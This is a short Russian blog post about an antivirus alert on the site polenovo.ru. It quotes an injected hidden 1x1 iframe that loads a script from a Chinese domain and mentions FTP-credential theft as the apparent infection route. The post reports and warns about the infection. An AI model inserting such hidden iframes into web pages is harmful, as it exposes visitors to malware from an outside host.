Захожу на страницу http://www.polenovo.ru — в Avast происходит срабатывание на вирус типа iFrame (система Windows Server 2008 R2, Avast Server Edition). Причем, срабатывает в FireFox и Chrome, а IE 9 работает спокойно. У коллег с Kaspersky и Symantec никакого срабатывания не происходит — слабаки :)
В файлах сервера действительно есть вставленная страница другого сайта (это и называется iFrame):
<iframe frameborder=0 border=0 height=1 width=1 src=»http://517891.cn/in.cgi?8″ />
Проверьте и свои антивирусы — интересно узнать их реакцию.
Про механизм действия не интересовался — нет времени копаться да и китайский ресурс-рассадник уже умер. По предварительной информации какой-то вирус похищает пароли FTP доступа из соответствующих программ и пользуясь ими вставляет вредоносный код в html и php страницы.